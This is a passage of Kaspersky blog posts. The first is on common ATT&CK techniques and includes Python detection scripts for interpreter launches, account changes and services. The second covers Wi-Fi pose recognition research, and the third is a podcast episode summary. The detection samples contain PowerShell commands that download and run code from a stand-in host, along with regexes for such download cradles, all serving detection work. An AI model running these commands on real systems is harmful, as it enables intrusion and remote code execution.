Command and scripting interpreter

ATT&CK Technique: T1059, Tactic: TA0002 (Execution)

What it is: In the vast majority of attacks, attackers need to execute their own code on compromised computers. To avoid attracting attention and to avoid deploying specialized malware, they often use legitimate scripting tools that are already installed on most corporate systems. The most popular of these is Microsoft PowerShell, but there are also attacks using scripts in Visual Basic (VBScript), Python, and AutoIt, as well as the basic Windows and Unix shells (cmd and sh/bash/zsh).

How to protect yourself: Use allowlisting (for example AppLocker or Windows Defender Application Control) to restrict the launch of applications not required on specific computers. Track the launch of script interpreters using XDR and EDR, and enable PowerShell script block logging so that obfuscated or base64-encoded commands are recorded in decoded form, but keep in mind that the detection logic must be continuously adjusted to the specifics of the organization’s IT infrastructure.
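What "tracking the launch of script interpreters" looks like in practice is a triage rule over process-creation telemetry: which interpreter started, what its parent was, and what the command line contains once any `-EncodedCommand` payload is decoded (it is base64 of UTF-16LE text). The following is an added example, not code from the original post or from Kaspersky; the events are constructed dicts with the fields a Sysmon Event ID 1 or Windows 4688 record provides, and the indicator list, the office-parent heuristic and the flagging rule are assumptions to tune per environment.

```python
"""Added example (not code from the original post): triaging script-interpreter
launches from process-creation telemetry.

Events are constructed dicts with the fields a Sysmon Event ID 1 / Windows 4688
record would give (image, parent image, command line); the indicator list,
flagging rule and the office-parent heuristic are assumptions to tune per environment.
"""
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Substrings that are common in attacker one-liners and rare in admin scripts.
INDICATORS = {
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"\bbypass\b", re.I),
    "inline_base64": re.compile(r"frombase64string", re.I),
}


def _is_encoded_flag(token):
    """powershell.exe accepts -EncodedCommand, -e, -ec and any prefix such as -enc."""
    t = token.lstrip("-/").lower()
    return t in ("e", "ec") or (len(t) >= 2 and "encodedcommand".startswith(t))


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(("-", "/")) and _is_encoded_flag(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage_interpreter_launches(events):
    """Score each interpreter launch; processes that are not interpreters are ignored."""
    results = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image not in INTERPRETERS:
            continue
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        reasons = []
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            reasons.append("encoded_command")
        if parent in OFFICE_PARENTS:        # Office spawning a shell is a classic macro sign
            reasons.append("office_parent")
        text = ev["cmdline"] + " " + (decoded or "")   # scan the real payload as well
        reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
        flagged = ("encoded_command" in reasons or "office_parent" in reasons
                   or len(reasons) >= 2)
        results.append({"image": image, "parent": parent, "reasons": reasons,
                        "decoded": decoded, "flagged": flagged})
    return results


# Constructed sample telemetry, not real events. The encoded payload is built
# here the same way an attacker would build it, so the decoder can be exercised.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},          # admin script
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},         # macro dropper
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "cmd.exe /c whoami /all"},                                   # noisy but benign
    {"image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "pwsh.exe -ExecutionPolicy Bypass -c \"Invoke-WebRequest "
                "http://203.0.113.7/u.exe -OutFile C:\\Users\\Public\\u.exe\""},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},                                    # not an interpreter
]

if __name__ == "__main__":
    for r in triage_interpreter_launches(SAMPLE_EVENTS):
        print(r["flagged"], r["image"], r["parent"], r["reasons"])
```

On the constructed events the inventory script and the `whoami` call pass, the Word-spawned encoded command is flagged with the decoded download cradle attached, and the `pwsh` download with an execution-policy bypass is flagged on two indicators. The decoded text is what script block logging would also give you; keeping the decoder in the pipeline means a rule can match on the payload even on hosts where that logging is off.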

Account manipulation

ATT&CK Technique: T1098, Tactics: TA0003, TA0004 (Persistence, Privilege Escalation)

What it is: A wide range of changes that attackers make to accounts they have access to. These changes can include adding an account to privileged groups, enabling deactivated accounts, changing passwords, and modifying permissions for accounts and groups.

How to protect yourself: Apply the principle of least privilege, perform regular account inventories, revoke outdated permissions, and block or delete unnecessary accounts. Alert on additions to privileged groups and on re-enabled accounts (Windows security events 4728/4732/4756 and 4722): such changes are rare in normal operations and therefore easy to baseline.

Exploitation of remote services

ATT&CK Technique: T1210, Tactic: TA0008 (Lateral Movement)

What it is: After compromising one of the computers on the network, attackers scan the network from it for vulnerable services on other hosts in order to infect additional computers or gain elevated privileges on them. In 2023, old vulnerabilities in SMB v1 and Exchange Server were quite popular, confirming that IT services are not paying enough attention to fixing vulnerabilities.

How to protect yourself: Update client and server applications promptly, disable unnecessary services on all computers, and use network segmentation and the principle of least privilege to limit attackers’ capabilities even if they manage to exploit a vulnerability. Use security solutions that can detect and block attempts to exploit vulnerabilities.

Launching system services

ATT&CK Technique: T1569, Tactic: TA0002 (Execution)

What it is: In addition to using command shells, attackers often execute malicious tasks and establish persistence by creating or starting system services. The undisputed leader here is PsExec: it copies a service binary to the target’s ADMIN$ share, registers it as a temporary service (PSEXESVC by default) through the Service Control Manager, and uses it to run the desired command on the remote Windows computer.

How to protect yourself: Use XDR or EDR systems that can track anomalous behavior of system services, and configure policies to restrict low-privileged users from launching privileged services and installing system software. Alert on new service installations (Windows System log event 7045) whose name or binary path matches PsExec-style tools, runs a command shell, or points to a user-writable directory.
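The account-manipulation and system-service sections above both come down to the same kind of rule: a small set of Windows event IDs whose normal rate is low enough that a simple match is already a useful alert. The following is an added example, not code from the original post or from Kaspersky, covering both: it flags additions to privileged groups and re-enabled accounts (events 4728/4732/4756, 4722, 4724) and PsExec-style or otherwise suspicious service installs (event 7045). The events are constructed dicts carrying the fields of the real event IDs they imitate; the group list, path patterns and severities are assumptions to adjust per environment.

```python
"""Added example (not code from the original post): flagging account
manipulation and suspicious service installs in Windows security/system events.

Events are constructed dicts carrying the fields of the real event IDs they
imitate (4728/4732/4756 member added to a group, 4722 account enabled, 4724
password reset, 7045 service installed). Group list, path patterns and
severities are assumptions to adjust per environment.
"""
import re

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins",
                     "administrators", "account operators", "backup operators",
                     "server operators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}
# Service binaries living outside %SystemRoot%/Program Files deserve a look.
WRITABLE_PATH = re.compile(r"\\(?:users|temp|programdata|appdata)\\", re.I)
# Cobalt Strike / Metasploit psexec modules often register a cmd one-liner as the service.
SHELL_IN_PATH = re.compile(r"%comspec%|\bcmd(?:\.exe)?\s+/[ck]\b|powershell", re.I)


def check_account_event(ev):
    """Account manipulation (T1098): privileged group changes, enabled accounts, resets."""
    eid = ev["event_id"]
    if eid in GROUP_ADD_EVENTS and ev.get("group", "").lower() in PRIVILEGED_GROUPS:
        return ("high", f"{ev['subject']} added {ev['target']} to {ev['group']}")
    if eid == 4722:
        return ("medium", f"{ev['subject']} enabled account {ev['target']}")
    if eid == 4724 and ev["subject"].lower() != ev["target"].lower():
        return ("medium", f"{ev['subject']} reset password of {ev['target']}")
    return None


def check_service_event(ev):
    """System services (T1569): PsExec-style and otherwise suspicious installs."""
    if ev["event_id"] != 7045:
        return None
    name, path = ev["service_name"], ev["image_path"]
    if name.upper().startswith("PSEXESVC") or "\\ADMIN$\\" in path.upper():
        return ("high", f"PsExec-style service {name!r} installed from {path}")
    if SHELL_IN_PATH.search(path):
        return ("high", f"service {name!r} runs a command shell: {path}")
    if WRITABLE_PATH.search(path):
        return ("medium", f"service {name!r} binary in user-writable path: {path}")
    return None


def triage_account_and_service_events(events):
    """Run both rule sets over an event stream and return the findings in order."""
    findings = []
    for ev in events:
        hit = check_account_event(ev) or check_service_event(ev)
        if hit:
            findings.append({"event_id": ev["event_id"], "host": ev["host"],
                             "severity": hit[0], "detail": hit[1]})
    return findings


SAMPLE_EVENTS = [  # constructed, not real logs
    {"event_id": 4728, "host": "DC01", "subject": "jdoe", "target": "svc_mon",
     "group": "Domain Admins"},                                   # privileged group
    {"event_id": 4732, "host": "WS17", "subject": "jdoe", "target": "svc_mon",
     "group": "Remote Desktop Users"},                            # not in the list
    {"event_id": 4722, "host": "DC01", "subject": "jdoe", "target": "backup_old"},
    {"event_id": 7045, "host": "FS02", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},                 # classic PsExec
    {"event_id": 7045, "host": "FS02", "service_name": "WinDefendUpd",
     "image_path": r"C:\Windows\Temp\upd.exe"},                   # binary in Temp
    {"event_id": 7045, "host": "FS02", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},           # normal install
    {"event_id": 7045, "host": "FS02", "service_name": "7e4a1c",
     "image_path": r"%COMSPEC% /c echo hello > \\.\pipe\7e4a1c"},  # framework psexec
]

if __name__ == "__main__":
    for f in triage_account_and_service_events(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["event_id"], f["detail"])
```

Note that renaming PsExec’s service (the `-r` option) defeats the name check, which is why the example also looks at the binary path and at shells embedded in it; a fuller rule would additionally join the 7045 event with the network logon (4624, logon type 3) and the ADMIN$ share access that precede it.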

Bonus track: LOLBins

In most stages of an attack, attackers try to use legitimate IT administration tools to blend in with normal network activity and avoid detection. Strictly speaking, LOLBins are binaries that ship with the operating system, such as PowerShell, but the same logic applies to legitimate third-party tools. Some cases have already been described above (PowerShell, PsExec), but in a significant number of attacks, attackers also use AnyDesk for remote management and control, Advanced IP Scanner and SoftPerfect Network Scanner for network scanning, and security testing tools: Mimikatz for credential dumping and the privilege escalation that follows, and Cobalt Strike and Metasploit for lateral movement within the network. You can read about protection against the use of LOLBins in a separate post.


Human body pose recognition using Wi-Fi signal | Kaspersky official blog

To find an honest man, Diogenes famously used a lantern – the philosopher relied solely on optical recognition methods. Today, however, scientists suggest using Wi-Fi signals for this purpose. More specifically, the method developed by three researchers at Carnegie Mellon University uses the signal from an ordinary home Wi-Fi router to not only pinpoint a person’s location in a room, but also to identify their pose.

Why Wi-Fi? There are several reasons for this. Firstly, unlike optical recognition, radio signals work perfectly in the dark and aren’t hindered by small obstacles like furniture. Secondly, it’s cheap, which can’t be said for lidars and radars – other tools that could potentially do the job. Thirdly, Wi-Fi is already ubiquitous – just reach out and grab it. But just how effective is this method? And what can you do with it? Let’s dive in.

DensePose: a method for recognizing human poses in images

To get started, however, we need to back up a bit – first, we need to understand how to accurately recognize the human body and its poses in general. In 2018, another group of scientists presented a method called DensePose. They successfully used it to recognize human poses in photographs – that is, two-dimensional images with no additional data for depth.

Here’s how it works: first, the DensePose model searches for objects in the images that are recognized as human bodies. These objects are then segmented into distinct areas, each corresponding to a specific body part, and analyzed individually. This approach is used because body parts move very differently: for example, the head and torso behave very differently from the arms and legs.

DensePose can accurately recognize the poses of human bodies in photographs and even create UV maps of their surfaces.

As a result, the model has learned to correlate a 2D image with the 3D surface of the human body, obtaining not only image annotations corresponding to the recognized pose, but also a UV map of the body depicted in the photo. The latter makes it possible, for example, to overlay a texture on the image.

Most impressively, this technique can accurately recognize the poses of multiple people in group photos, even those chaotic “prom night” pictures where people are huddled together and partially obstruct each other.

DensePose accurately recognizes the positions of individual figures in group photos.

What’s more, if the images presented in the paper and the videos published by the researchers are to be believed, the system can confidently handle even the most unusual body positions. For example, the neural network correctly identifies people on bicycles, motorcycles, and horseback, and also accurately determines the poses of baseball players, soccer players, and even breakdancers, who often move in unpredictable ways.

The DensePose model works well even for highly unusual poses.

Another advantage of DensePose is that it doesn’t demand extraordinary computing power to work. Using a GeForce GTX 1080 – hardly a top-of-the-line graphics card, even at the time the study was published – DensePose processes 20-26 frames per second at a resolution of 240×320 and up to five frames per second at a resolution of 800×1100.

DensePose over Wi-Fi: radio waves instead of photos

Basically, the Carnegie Mellon researchers’ idea was to use the existing high-performance body recognition AI model, DensePose, but feed it Wi-Fi signals instead of photographs.

For their experiment, they constructed the following setup:

Two stands with standard TP-Link home routers, each equipped with three antennas: one served as a transmitter, the other as a receiver.
The recognition scene positioned between these stands.
A camera mounted on a stand next to the receiver router, capturing the same scene that the researchers were aiming to recognize using Wi-Fi signals.

General diagram of the test bench for recognizing human poses using Wi-Fi.

Next, they ran DensePose, which identified body positions using the camera installed next to the receiver router, and tasked it with training another neural network that worked with the Wi-Fi signal from the receiving router. This signal was preprocessed and modified for more reliable recognition – but these are minor details. The point is that the researchers were indeed able to create a new Wi-Fi-DensePose model that accurately reconstructs the spatial positions of human bodies using Wi-Fi signals.

In good conditions, the model can recognize human poses very well.

Limitations of the method

However, let’s not rush to write headlines like “Scientists Learn to See Through Walls Using Wi-Fi” just yet. First of all, the “seeing” here is quite abstract – the model doesn’t actually “see” the human body, but can predict its location and pose with a certain probability based on indirect data.

Visualizing anything with intricate detail using Wi-Fi signals is a complex challenge. This is demonstrated by another, similar study in which researchers experimented with objects much simpler than human bodies – and the results were, to put it mildly, far from ideal.

Visualizing objects using a Wi-Fi signal: the less pronounced the edges, the worse it turns out.

It’s also important to note that the model built by the Carnegie Mellon University researchers is significantly less accurate than the original method of recognizing poses in photographs, and also exhibits quite serious “hallucinations”. The model has particular difficulty with unusual poses or scenes involving more than two people.

The Wi-Fi-DensePose model does not do a good job of handling non-standard poses or large numbers of human bodies in a single scene.

In addition, the test conditions in the study were meticulously controlled: a simple, well-defined geometry, a clear line of sight between the transmitter and receiver, minimal radio signal interference – the researchers set up everything so they could easily “penetrate” the scene with radio waves. This ideal scenario is unlikely to be replicated in the real world.

So if you’re worried about someone hacking into your Wi-Fi router and monitoring what you do at home, relax. If there’s anything to be concerned about in your home, it’s household appliances. For example, smart pet feeders or even children’s toys have cameras, microphones, and cloud connectivity, while robot vacuum cleaners even have lidars that work flawlessly in the dark, as well as the ability to move around.

And just outside, another spy is waiting for you – a four-wheeled one. In terms of the amount of information they collect, today’s cars are miles ahead of smartwatches, smart speakers, and other everyday gadgets.


Transatlantic Cable podcast episode 346 | Kaspersky official blog

For the 346th episode of the Kaspersky Transatlantic Cable Podcast, Jag and I dive into a handful of stories that tie back to disinformation, privacy, and people persisting, before ending with the WTF story of the week (and perhaps year).

We kick things off discussing WhatsApp and encryption, but more importantly how the app’s boss understands that it is being used – even in countries where there are bans on the popular messenger app. From there, we jump into the story from last week that impacts users of Dropbox. After covering what it is, we discuss some safety measures that can be used by people using the service.

For our third story, we dive into the world of TikTok. While the US ban may be top of mind, we are actually crossing the world to discuss a recent phenomenon on the app that ties back to North Korea. It isn’t a hack, but rather an odd case of a propaganda song from the country going viral on the popular platform. Who would have thought that disinformation could go viral? But hey, I guess the beat slaps (as the kids say).

After that bit of head scratching, we head back to the US, where recent research has shown that phishing sites impersonating the USPS are getting almost as much traffic as the real site. To close things out, we dive into AI and porn. More specifically, a new app being advertised on PornHub that allows anyone with the app to see any person naked, with the help of AI and without consent.

If you liked what you heard, please consider subscribing.

Tens of millions secretly use WhatsApp despite bans
Dropbox says hackers stole customer data, auth secrets from eSignature service
Why North Korea’s latest propaganda bop is a huge TikTok hit
US Post Office phishing sites get as much traffic as the real one
Pornhub’s Nonconsensual ‘Nudify’ Ad
